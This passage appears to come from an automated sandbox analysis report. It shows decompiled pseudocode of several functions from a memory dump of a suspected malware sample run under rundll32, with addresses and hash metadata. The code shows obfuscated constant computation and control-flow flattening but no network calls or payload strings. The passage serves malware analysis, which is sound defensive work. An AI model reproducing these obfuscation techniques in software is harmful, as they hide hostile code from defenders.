                                                                                                                      				_v108 = 0x5e168a;
                                                                                                                      				_v108 = _v108 >> 0x10;
                                                                                                                      				_v108 = _v108 + 0xda32;
                                                                                                                      				_v108 = _v108 ^ 0x00005a0c;
                                                                                                                      				_v116 = 0x4fe29d;
                                                                                                                      				_v116 = _v116 >> 0x10;
                                                                                                                      				_v116 = _v116 << 4;
                                                                                                                      				_v116 = _v116 ^ 0x0003d351;
                                                                                                                      				_v88 = 0xa9a316;
                                                                                                                      				_v88 = _v88 + 0xe91b;
                                                                                                                      				_v88 = _v88 ^ 0x00a1e0df;
                                                                                                                      				_v136 = 0x77a290;
                                                                                                                      				_v136 = _v136 << 0xc;
                                                                                                                      				_t289 = 0x74;
                                                                                                                      				_v136 = _v136 / _t289;
                                                                                                                      				_v136 = _v136 + 0xffff257b;
                                                                                                                      				_v136 = _v136 ^ 0x01061e79;
                                                                                                                      				_v152 = 0x936910;
                                                                                                                      				_v152 = _v152 * 0x7a;
                                                                                                                      				_v152 = _v152 >> 3;
                                                                                                                      				_v152 = _v152 + 0xffff8db3;
                                                                                                                      				_v152 = _v152 ^ 0x08cdb86a;
                                                                                                                      				_v128 = 0x509c4c;
                                                                                                                      				_v128 = _v128 + 0x81f1;
                                                                                                                      				_v128 = _v128 + 0x9dbc;
                                                                                                                      				_v128 = _v128 >> 5;
                                                                                                                      				_v128 = _v128 ^ 0x00071675;
                                                                                                                      				_v148 = 0xcab80c;
                                                                                                                      				_v148 = _v148 >> 0xd;
                                                                                                                      				_v148 = _v148 | 0x660debd0;
                                                                                                                      				_v148 = _v148 + 0xf630;
                                                                                                                      				_v148 = _v148 ^ 0x660fbc32;
                                                                                                                      				_v104 = 0xc88284;
                                                                                                                      				_v104 = _v104 ^ 0xe0b202bb;
                                                                                                                      				_v104 = _v104 * 0x70;
                                                                                                                      				_v104 = _v104 ^ 0x35911582;
                                                                                                                      				_v84 = 0x688efd;
                                                                                                                      				_v84 = _v84 ^ 0xa5781683;
                                                                                                                      				_v84 = _v84 ^ 0xa515c2ff;
                                                                                                                      				_v156 = 0x3b8040;
                                                                                                                      				_v156 = _v156 | 0xffdbffba;
                                                                                                                      				_v156 = _v156 ^ 0xfff6b3f0;
                                                                                                                      				_v72 = 0x8d74e9;
                                                                                                                      				_v72 = _v72 >> 8;
                                                                                                                      				_v72 = _v72 ^ 0x0004dfda;
                                                                                                                      				_v160 = 0xbd1b1c;
                                                                                                                      				_v160 = _v160 << 0xc;
                                                                                                                      				_v160 = _v160 | 0x33bb8ca8;
                                                                                                                      				_v160 = _v160 ^ 0xcf7854ed;
                                                                                                                      				_v160 = _v160 ^ 0x3ccd45a9;
                                                                                                                      				_v120 = 0x48e6fb;
                                                                                                                      				_v120 = _v120 | 0xe61fffb2;
                                                                                                                      				_v120 = _v120 ^ 0xe6598779;
                                                                                                                      				_v68 = 0x77306;
                                                                                                                      				_v68 = _v68 >> 6;
                                                                                                                      				_v68 = _v68 ^ 0x0008dc17;
                                                                                                                      				_v112 = 0x774006;
                                                                                                                      				_v112 = _v112 << 0xd;
                                                                                                                      				_v112 = _v112 + 0xffffb426;
                                                                                                                      				_v112 = _v112 ^ 0xe80ab914;
                                                                                                                      				_v144 = 0x2b5eea;
                                                                                                                      				_t290 = 0x79;
                                                                                                                      				_v144 = _v144 * 0x59;
                                                                                                                      				_v144 = _v144 + 0xffffa818;
                                                                                                                      				_v144 = _v144 ^ 0xb076c16e;
                                                                                                                      				_v144 = _v144 ^ 0xbf611da3;
                                                                                                                      				_v96 = 0xa17410;
                                                                                                                      				_v96 = _v96 | 0x939b80d1;
                                                                                                                      				_v96 = _v96 / _t290;
                                                                                                                      				_v96 = _v96 ^ 0x01375591;
                                                                                                                      				_v80 = 0xb3b8;
                                                                                                                      				_t291 = 0x5c;
                                                                                                                      				_v80 = _v80 / _t291;
                                                                                                                      				_v80 = _v80 ^ 0x0003830b;
                                                                                                                      				_v76 = 0xc52b4a;
                                                                                                                      				_v76 = _v76 >> 0xe;
                                                                                                                      				_v76 = _v76 ^ 0x00071242;
                                                                                                                      				_v92 = 0xc8fd49;
                                                                                                                      				_t292 = 0x54;
                                                                                                                      				_v92 = _v92 / _t292;
                                                                                                                      				_v92 = _v92 ^ 0x044db90d;
                                                                                                                      				_v92 = _v92 ^ 0x044d9acc;
                                                                                                                      				_v100 = 0x5afe59;
                                                                                                                      				_v100 = _v100 ^ 0x0de7f0e8;
                                                                                                                      				_v100 = _v100 | 0x5cb6a54b;
                                                                                                                      				_v100 = _v100 ^ 0x5db2bb74;
                                                                                                                      				_v124 = 0xa19aac;
                                                                                                                      				_v124 = _v124 + 0xffff97b1;
                                                                                                                      				_v124 = _v124 * 0x3e;
                                                                                                                      				_v124 = _v124 >> 0xe;
                                                                                                                      				_v124 = _v124 ^ 0x000bad60;
                                                                                                                      				while(_t263 != 0xd5ede2) {
                                                                                                                      					if(_t263 == 0x1cd9a3d) {
                                                                                                                      						_t263 = 0xd5ede2;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						if(_t263 == 0x72d0ec7) {
                                                                                                                      							_t247 = E002BB09F(_v148, _v104,  &_v52, _v84, _t287 + 8, _v156);
                                                                                                                      							_t295 = _t295 + 0x10;
                                                                                                                      							__eflags = _t247;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								_t263 = 0x78e1ae6;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t263 == 0x78e1ae6) {
                                                                                                                      								_t251 = E002BB09F(_v72, _v160,  &_v52, _v120, _t287 + 0xc, _v68);
                                                                                                                      								_t295 = _t295 + 0x10;
                                                                                                                      								__eflags = _t251;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t263 = 0xabcd4f8;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t263 == 0x7ae58b3) {
                                                                                                                      									__eflags = E002CB9B1(_v76, _v92, __eflags, _t287 + 0x2c, _v100,  &_v52, _v124);
                                                                                                                      									_t288 =  !=  ? 1 : _t288;
                                                                                                                      								} else {
                                                                                                                      									if(_t263 == 0xabcd4f8) {
                                                                                                                      										_t257 = E002BB09F(_v112, _v144,  &_v52, _v96, _t287 + 0x40, _v80);
                                                                                                                      										_t295 = _t295 + 0x10;
                                                                                                                      										__eflags = _t257;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_t263 = 0x7ae58b3;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t263 != 0xc0b979a) {
                                                                                                                      											L18:
                                                                                                                      											__eflags = _t263 - 0x38140c5;
                                                                                                                      											if(__eflags != 0) {
                                                                                                                      												continue;
                                                                                                                      											} else {
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											_t260 = E002BB09F(_v88, _v136,  &_v52, _v152, _t287 + 0x38, _v128);
                                                                                                                      											_t295 = _t295 + 0x10;
                                                                                                                      											if(_t260 != 0) {
                                                                                                                      												_t263 = 0x72d0ec7;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t288;
                                                                                                                      				}
                                                                                                                      				E002C64C5(_v132, _v140, _v108, _v116, _t261,  &_v52);
                                                                                                                      				_t295 = _t295 + 0x10;
                                                                                                                      				_t263 = 0xc0b979a;
                                                                                                                      				goto L18;
                                                                                                                      			}
                                                                                                                      0x002bcc4e
                                                                                                                      0x002bcc56
                                                                                                                      0x002bcc5e
                                                                                                                      0x002bcc66
                                                                                                                      0x002bcc6e
                                                                                                                      0x002bcc76
                                                                                                                      0x002bcc7b
                                                                                                                      0x002bcc83
                                                                                                                      0x002bcc8b
                                                                                                                      0x002bcc90
                                                                                                                      0x002bcc98
                                                                                                                      0x002bcca0
                                                                                                                      0x002bccaf
                                                                                                                      0x002bccb2
                                                                                                                      0x002bccb6
                                                                                                                      0x002bccbe
                                                                                                                      0x002bccc6
                                                                                                                      0x002bccce
                                                                                                                      0x002bccd6
                                                                                                                      0x002bcce6
                                                                                                                      0x002bccea
                                                                                                                      0x002bccf2
                                                                                                                      0x002bccfe
                                                                                                                      0x002bcd03
                                                                                                                      0x002bcd09
                                                                                                                      0x002bcd11
                                                                                                                      0x002bcd19
                                                                                                                      0x002bcd1e
                                                                                                                      0x002bcd26
                                                                                                                      0x002bcd32
                                                                                                                      0x002bcd3a
                                                                                                                      0x002bcd3e
                                                                                                                      0x002bcd46
                                                                                                                      0x002bcd4e
                                                                                                                      0x002bcd56
                                                                                                                      0x002bcd5e
                                                                                                                      0x002bcd66
                                                                                                                      0x002bcd6e
                                                                                                                      0x002bcd76
                                                                                                                      0x002bcd83
                                                                                                                      0x002bcd87
                                                                                                                      0x002bcd8c
                                                                                                                      0x002bcd94
                                                                                                                      0x002bcda2
                                                                                                                      0x002bceb1
                                                                                                                      0x00000000
                                                                                                                      0x002bcda8
                                                                                                                      0x002bcdae
                                                                                                                      0x002bce9b
                                                                                                                      0x002bcea0
                                                                                                                      0x002bcea3
                                                                                                                      0x002bcea5
                                                                                                                      0x002bcea7
                                                                                                                      0x00000000
                                                                                                                      0x002bcea7
                                                                                                                      0x002bcdb4
                                                                                                                      0x002bcdba
                                                                                                                      0x002bce65
                                                                                                                      0x002bce6a
                                                                                                                      0x002bce6d
                                                                                                                      0x002bce6f
                                                                                                                      0x002bce75
                                                                                                                      0x00000000
                                                                                                                      0x002bce75
                                                                                                                      0x002bcdc0
                                                                                                                      0x002bcdc6
                                                                                                                      0x002bcf13
                                                                                                                      0x002bcf15
                                                                                                                      0x002bcdcc
                                                                                                                      0x002bcdd2
                                                                                                                      0x002bce2f
                                                                                                                      0x002bce34
                                                                                                                      0x002bce37
                                                                                                                      0x002bce39
                                                                                                                      0x002bce3f
                                                                                                                      0x00000000
                                                                                                                      0x002bce3f
                                                                                                                      0x002bcdd4
                                                                                                                      0x002bcdda
                                                                                                                      0x002bcede
                                                                                                                      0x002bcede
                                                                                                                      0x002bcee4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002bceea
                                                                                                                      0x002bcde0
                                                                                                                      0x002bcdfc
                                                                                                                      0x002bce01
                                                                                                                      0x002bce06
                                                                                                                      0x002bce0c
                                                                                                                      0x00000000
                                                                                                                      0x002bce0c
                                                                                                                      0x002bce06
                                                                                                                      0x002bcdda
                                                                                                                      0x002bcdd2
                                                                                                                      0x002bcdc6
                                                                                                                      0x002bcdba
                                                                                                                      0x002bcdae
                                                                                                                      0x002bcf24
                                                                                                                      0x002bcf24
                                                                                                                      0x002bced1
                                                                                                                      0x002bced6
                                                                                                                      0x002bced9
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RU7
                                                                                                                      • API String ID: 0-4010291154
                                                                                                                      • Opcode ID: 7af6df2ff8a9b6f82361f13cbade41a7c387482da999aa364547f9e347cbb905
                                                                                                                      • Instruction ID: ccb1d4b0293022b1e9b12bd7bd60a56f98951aa42aef75dd9f3e2bec6e693aad
                                                                                                                      • Opcode Fuzzy Hash: 7af6df2ff8a9b6f82361f13cbade41a7c387482da999aa364547f9e347cbb905
                                                                                                                      • Instruction Fuzzy Hash: E0C130711183869FD768CE61C88996BFBE5FBC4388F108A1DF69682260D3B5C959CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E002C64F1(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                      				char _v36;
                                                                                                                      				intOrPtr _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				void* _t137;
                                                                                                                      				void* _t150;
                                                                                                                      				intOrPtr _t151;
                                                                                                                      				void* _t157;
                                                                                                                      				intOrPtr* _t172;
                                                                                                                      				intOrPtr _t173;
                                                                                                                      				signed int _t174;
                                                                                                                      				signed int _t175;
                                                                                                                      				signed int _t176;
                                                                                                                      				signed int* _t179;
                                                                                                                      
                                                                                                                      				_t155 = _a4;
                                                                                                                      				_push(_a8);
                                                                                                                      				_t172 = __ecx;
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t137);
                                                                                                                      				_v48 = 0x93d665;
                                                                                                                      				_t179 =  &(( &_v100)[4]);
                                                                                                                      				_t173 = 0;
                                                                                                                      				_v44 = 0;
                                                                                                                      				_t157 = 0x9466795;
                                                                                                                      				_v40 = 0;
                                                                                                                      				_v92 = 0xc35ba1;
                                                                                                                      				_v92 = _v92 + 0xcdf2;
                                                                                                                      				_t174 = 0x24;
                                                                                                                      				_v92 = _v92 / _t174;
                                                                                                                      				_v92 = _v92 ^ 0x5a7ecd09;
                                                                                                                      				_v92 = _v92 ^ 0x5a7bbfe7;
                                                                                                                      				_v56 = 0x6ac612;
                                                                                                                      				_v56 = _v56 ^ 0x41bcc0f7;
                                                                                                                      				_v56 = _v56 + 0xffffadf0;
                                                                                                                      				_v56 = _v56 ^ 0x41d5b4d5;
                                                                                                                      				_v100 = 0xa175c9;
                                                                                                                      				_v100 = _v100 | 0xb7da1d5b;
                                                                                                                      				_v100 = _v100 ^ 0x832b9b3a;
                                                                                                                      				_v100 = _v100 ^ 0xfbd8173c;
                                                                                                                      				_v100 = _v100 ^ 0xcf0e566f;
                                                                                                                      				_v68 = 0xb337e;
                                                                                                                      				_v68 = _v68 >> 0xf;
                                                                                                                      				_v68 = _v68 + 0xffffb10e;
                                                                                                                      				_v68 = _v68 ^ 0xfff97d65;
                                                                                                                      				_v72 = 0x51a563;
                                                                                                                      				_v72 = _v72 | 0x5dd657cd;
                                                                                                                      				_v72 = _v72 >> 0xb;
                                                                                                                      				_v72 = _v72 ^ 0x0003baa1;
                                                                                                                      				_v76 = 0xe50ce8;
                                                                                                                      				_t175 = 0x4f;
                                                                                                                      				_v76 = _v76 / _t175;
                                                                                                                      				_v76 = _v76 | 0x5f70b90d;
                                                                                                                      				_v76 = _v76 ^ 0x5f701ab2;
                                                                                                                      				_v80 = 0xbdb868;
                                                                                                                      				_v80 = _v80 * 0x3f;
                                                                                                                      				_v80 = _v80 + 0x8645;
                                                                                                                      				_v80 = _v80 | 0x0d4f9aa3;
                                                                                                                      				_v80 = _v80 ^ 0x2ff450e8;
                                                                                                                      				_v52 = 0x17e057;
                                                                                                                      				_v52 = _v52 >> 0xc;
                                                                                                                      				_v52 = _v52 ^ 0x00020d27;
                                                                                                                      				_v60 = 0xa13b54;
                                                                                                                      				_v60 = _v60 * 0x33;
                                                                                                                      				_v60 = _v60 ^ 0x49292d47;
                                                                                                                      				_v60 = _v60 ^ 0x693c6a3c;
                                                                                                                      				_v84 = 0xcd99b1;
                                                                                                                      				_v84 = _v84 + 0x2d8d;
                                                                                                                      				_v84 = _v84 << 7;
                                                                                                                      				_v84 = _v84 + 0xffff7b1e;
                                                                                                                      				_v84 = _v84 ^ 0x66e29e95;
                                                                                                                      				_v88 = 0xe50b02;
                                                                                                                      				_v88 = _v88 ^ 0x6ddcea1b;
                                                                                                                      				_v88 = _v88 >> 0x10;
                                                                                                                      				_v88 = _v88 * 0x49;
                                                                                                                      				_v88 = _v88 ^ 0x001db712;
                                                                                                                      				_v64 = 0xb5c75b;
                                                                                                                      				_v64 = _v64 * 0x46;
                                                                                                                      				_t176 = 0x77;
                                                                                                                      				_v64 = _v64 / _t176;
                                                                                                                      				_v64 = _v64 ^ 0x006c56aa;
                                                                                                                      				_v96 = 0xaabe6e;
                                                                                                                      				_v96 = _v96 << 5;
                                                                                                                      				_v96 = _v96 + 0xffff8361;
                                                                                                                      				_v96 = _v96 << 3;
                                                                                                                      				_v96 = _v96 ^ 0xaab2b903;
                                                                                                                      				do {
                                                                                                                      					while(_t157 != 0x179a40a) {
                                                                                                                      						if(_t157 == 0x8ebb7f5) {
                                                                                                                      							_t151 =  *0x2d5c9c; // 0x0
                                                                                                                      							E002CD6C0(_v80, _v52, _v60, _t157, _v84, _v88,  &_v36, _t157, _v64, _v92, _v96,  *_t155,  *((intOrPtr*)(_t155 + 4)),  *((intOrPtr*)(_t151 + 8)));
                                                                                                                      							_t173 =  ==  ? 1 : _t173;
                                                                                                                      						} else {
                                                                                                                      							if(_t157 != 0x9466795) {
                                                                                                                      								goto L8;
                                                                                                                      							} else {
                                                                                                                      								_t157 = 0x179a40a;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L11:
                                                                                                                      						return _t173;
                                                                                                                      					}
                                                                                                                      					_push( *_t172);
                                                                                                                      					_t150 = E002C1831(_v68, _v72,  &_v36, _v76, _t157,  *((intOrPtr*)(_t172 + 4)));
                                                                                                                      					_t179 =  &(_t179[6]);
                                                                                                                      					if(_t150 == 0) {
                                                                                                                      						_t157 = 0x49089dc;
                                                                                                                      						goto L8;
                                                                                                                      					} else {
                                                                                                                      						_t157 = 0x8ebb7f5;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L11;
                                                                                                                      					L8:
                                                                                                                      				} while (_t157 != 0x49089dc);
                                                                                                                      				goto L11;
                                                                                                                      			}






























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <j<i
                                                                                                                      • API String ID: 0-2573498096
                                                                                                                      • Opcode ID: 882f4ae8aac2b9a38184b985ab5bfe03c1583939dc597bfd4144be89654b652d
                                                                                                                      • Instruction ID: 1bfd5abff4d7e7f7571d2b9f8112eb742bf95de726954604300566881a67d245
                                                                                                                      • Opcode Fuzzy Hash: 882f4ae8aac2b9a38184b985ab5bfe03c1583939dc597bfd4144be89654b652d
                                                                                                                      • Instruction Fuzzy Hash: 8B6120B14093419FC754CF25C98A91BFBE6FBC4B58F409A1EF58696220D3B18A49CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002C4B56() {
                                                                                                                      				char _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _t95;
                                                                                                                      				signed int _t101;
                                                                                                                      				signed int _t103;
                                                                                                                      				void* _t104;
                                                                                                                      				signed int _t122;
                                                                                                                      				signed int _t123;
                                                                                                                      				signed int _t124;
                                                                                                                      				void* _t126;
                                                                                                                      				signed int _t127;
                                                                                                                      				signed int* _t128;
                                                                                                                      
                                                                                                                      				_t128 =  &_v564;
                                                                                                                      				_v556 = 0x172e57;
                                                                                                                      				_v556 = _v556 ^ 0x73ef0dea;
                                                                                                                      				_t104 = 0x4d22871;
                                                                                                                      				_v556 = _v556 << 5;
                                                                                                                      				_v556 = _v556 ^ 0x7f0420db;
                                                                                                                      				_v564 = 0x28c43f;
                                                                                                                      				_t122 = 0x37;
                                                                                                                      				_v564 = _v564 / _t122;
                                                                                                                      				_v564 = _v564 ^ 0x0004b302;
                                                                                                                      				_t126 = 0;
                                                                                                                      				_v540 = 0xa3dd1;
                                                                                                                      				_v540 = _v540 >> 7;
                                                                                                                      				_v540 = _v540 ^ 0x000ead4a;
                                                                                                                      				_v548 = 0xb6c83;
                                                                                                                      				_v548 = _v548 >> 2;
                                                                                                                      				_v548 = _v548 ^ 0x000dd0d2;
                                                                                                                      				_v544 = 0xa789eb;
                                                                                                                      				_t123 = 0x5a;
                                                                                                                      				_v544 = _v544 / _t123;
                                                                                                                      				_v544 = _v544 ^ 0x000aafac;
                                                                                                                      				_v532 = 0x6a9d21;
                                                                                                                      				_t124 = 0x13;
                                                                                                                      				_t125 = _v564;
                                                                                                                      				_v532 = _v532 / _t124;
                                                                                                                      				_v532 = _v532 ^ 0x0003d3c1;
                                                                                                                      				_v528 = 0x3996e5;
                                                                                                                      				_v528 = _v528 >> 4;
                                                                                                                      				_v528 = _v528 ^ 0x0009e8d5;
                                                                                                                      				_t103 = _v564;
                                                                                                                      				_t127 = _v564;
                                                                                                                      				_v536 = 0xc5251e;
                                                                                                                      				_v536 = _v536 ^ 0x87fb489f;
                                                                                                                      				_v536 = _v536 ^ 0x87377a50;
                                                                                                                      				_v560 = 0x43b612;
                                                                                                                      				_v560 = _v560 >> 0xe;
                                                                                                                      				_v560 = _v560 ^ 0x7320a641;
                                                                                                                      				_v560 = _v560 ^ 0xd4a0e575;
                                                                                                                      				_v560 = _v560 ^ 0xa78970ff;
                                                                                                                      				_v552 = 0x3a31ae;
                                                                                                                      				_v552 = _v552 ^ 0x0baee347;
                                                                                                                      				_v552 = _v552 ^ 0x0b916be4;
                                                                                                                      				do {
                                                                                                                      					while(_t104 != 0x42ef3b0) {
                                                                                                                      						if(_t104 == 0x4d22871) {
                                                                                                                      							_t104 = 0xc70fe83;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t104 == 0x81a395a) {
                                                                                                                      								_v564 = 0x2f01d9;
                                                                                                                      								_v564 = _v564 + 0xd8f0;
                                                                                                                      								_v564 = _v564 ^ 0x2a08da2b;
                                                                                                                      								__eflags = _t103 - _v564;
                                                                                                                      								_t126 = (_t103 == _v564) ? 1 : _t126;
                                                                                                                      							} else {
                                                                                                                      								if(_t104 == 0x918a316) {
                                                                                                                      									_t103 = E002B7677(_t127, _v536, _v560, _v552);
                                                                                                                      									_t104 = 0x81a395a;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t104 == 0xc70fe83) {
                                                                                                                      										_t101 = E002BC706();
                                                                                                                      										_t125 = _t101;
                                                                                                                      										__eflags = _t101;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_t104 = 0x42ef3b0;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t104 != 0xea0747d) {
                                                                                                                      											goto L15;
                                                                                                                      										} else {
                                                                                                                      											_t127 = E002C4FA8(_v544,  &_v524, _v532, _v528);
                                                                                                                      											_t104 = 0x918a316;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L18:
                                                                                                                      						return _t126;
                                                                                                                      					}
                                                                                                                      					_t95 = E002D1993(_v564, _v540, __eflags,  &_v524, _t104, _v548, _t125);
                                                                                                                      					_t128 =  &(_t128[4]);
                                                                                                                      					__eflags = _t95;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t104 = 0xffaf3fd;
                                                                                                                      						goto L15;
                                                                                                                      					} else {
                                                                                                                      						_t104 = 0xea0747d;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      					L15:
                                                                                                                      					__eflags = _t104 - 0xffaf3fd;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L18;
                                                                                                                      			}


                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: s
                                                                                                                      • API String ID: 0-1867647943
                                                                                                                      • Opcode ID: 34bd5959cf2d6eb589c4a5b2399f6c39d3f0ab0d666f3f677d61167571982d03
                                                                                                                      • Instruction ID: 4807c5cc0f16afa189cb0aca4f6a496578f6dc0ef5ad3e5a9ddc888059de7998
                                                                                                                      • Opcode Fuzzy Hash: 34bd5959cf2d6eb589c4a5b2399f6c39d3f0ab0d666f3f677d61167571982d03
                                                                                                                      • Instruction Fuzzy Hash: 8351DE712193419FC318EF61D5A5A2BBBE1EFC4708F208A1EF59696260C770CA19CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002BE86A() {
                                                                                                                      				char _v520;
                                                                                                                      				signed int _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _t97;
                                                                                                                      				signed int _t99;
                                                                                                                      				intOrPtr _t100;
                                                                                                                      				void* _t105;
                                                                                                                      				signed int _t114;
                                                                                                                      				short* _t117;
                                                                                                                      				signed int* _t119;
                                                                                                                      
                                                                                                                      				_t119 =  &_v564;
                                                                                                                      				_v560 = 0xce5cf0;
                                                                                                                      				_v560 = _v560 | 0x815fac8b;
                                                                                                                      				_t105 = 0x687a68b;
                                                                                                                      				_t114 = 0x3d;
                                                                                                                      				_v560 = _v560 / _t114;
                                                                                                                      				_v560 = _v560 ^ 0x02257571;
                                                                                                                      				_v552 = 0x865242;
                                                                                                                      				_v552 = _v552 * 0x34;
                                                                                                                      				_v552 = _v552 >> 6;
                                                                                                                      				_v552 = _v552 ^ 0x0066bbb6;
                                                                                                                      				_v524 = 0xc32fa5;
                                                                                                                      				_v524 = _v524 * 0x41;
                                                                                                                      				_v524 = _v524 ^ 0x3182565b;
                                                                                                                      				_v548 = 0xb61c38;
                                                                                                                      				_v548 = _v548 * 0x62;
                                                                                                                      				_v548 = _v548 | 0xd3f7f889;
                                                                                                                      				_v548 = _v548 ^ 0xd7f1c5f5;
                                                                                                                      				_v536 = 0xb1408a;
                                                                                                                      				_v536 = _v536 >> 3;
                                                                                                                      				_v536 = _v536 ^ 0x001ed817;
                                                                                                                      				_v556 = 0x4c3333;
                                                                                                                      				_v556 = _v556 + 0xffff679f;
                                                                                                                      				_v556 = _v556 >> 0xf;
                                                                                                                      				_v556 = _v556 ^ 0x000b6621;
                                                                                                                      				_v528 = 0x174ea7;
                                                                                                                      				_v528 = _v528 >> 8;
                                                                                                                      				_v528 = _v528 ^ 0x00085e65;
                                                                                                                      				_v540 = 0x951329;
                                                                                                                      				_v540 = _v540 ^ 0x02360ba7;
                                                                                                                      				_v540 = _v540 ^ 0x02aaf891;
                                                                                                                      				_v564 = 0x7a8127;
                                                                                                                      				_v564 = _v564 | 0x4a3ea7d2;
                                                                                                                      				_v564 = _v564 * 0x6d;
                                                                                                                      				_v564 = _v564 + 0xffffd056;
                                                                                                                      				_v564 = _v564 ^ 0xb7eba97a;
                                                                                                                      				_v532 = 0x65650b;
                                                                                                                      				_t97 = _v532 * 5;
                                                                                                                      				_v532 = _t97;
                                                                                                                      				_v532 = _v532 ^ 0x01f4ff6f;
                                                                                                                      				do {
                                                                                                                      					while(_t105 != 0xb436d6) {
                                                                                                                      						if(_t105 == 0x2c7b739) {
                                                                                                                      							_t100 =  *0x2d520c; // 0x0
                                                                                                                      							__eflags = _t100 + 0x220;
                                                                                                                      							return E002C08A0(_t117, _v540, _v564, _t100 + 0x220, _v532);
                                                                                                                      						}
                                                                                                                      						if(_t105 == 0x687a68b) {
                                                                                                                      							_t105 = 0xdf97892;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t125 = _t105 - 0xdf97892;
                                                                                                                      						if(_t105 != 0xdf97892) {
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						_t97 = E002D12A8(_t105, _v560, _t125, _v552, _v524,  &_v520);
                                                                                                                      						_t119 =  &(_t119[3]);
                                                                                                                      						_t105 = 0xb436d6;
